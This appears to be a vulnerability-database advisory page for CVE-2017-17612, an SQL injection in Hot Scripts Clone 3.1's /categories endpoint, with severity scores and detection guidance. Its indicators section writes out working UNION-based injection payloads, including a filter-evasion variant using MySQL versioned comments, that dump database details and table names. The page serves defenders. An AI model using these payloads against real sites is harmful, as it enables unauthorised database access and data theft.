cbcvebase.
CVE-2017-17612
published 2017-12-13

CVE-2017-17612: Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.

PriorityP260critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.66%
88.2th percentile
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
hot_scripts_clone_projecthot_scripts_clone

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
urlhttp://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
command-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command-Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
path/categories
  • Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'subctid' parameter, specifically looking for UNION-based payloads with quote characters and comment sequences (--+-).
  • Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'mctid' parameter, including UNION ALL SELECT payloads targeting INFORMATION_SCHEMA.TABLES.
  • Detect MySQL inline comment obfuscation technique using /*!08888UNION*/, /*!08888ALL*/, /*!08888SELECT*/ versioned comment syntax used to bypass WAF/filters in the mctid and subctid parameters.
  • Detect combined injection attempts where both subctid and mctid parameters are supplied simultaneously with SQL payloads.
  • ·Exploit PoC uses [PATH] as a placeholder for the application's installation subdirectory; the /categories endpoint may be at a non-root path depending on deployment.
  • ·CVE was assigned N/A in the original exploit submissions; the CVE-2017-17612 assignment came later via NVD and covers version 3.1, while exploit EDB-43916 targets version 1.0 of the same product.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.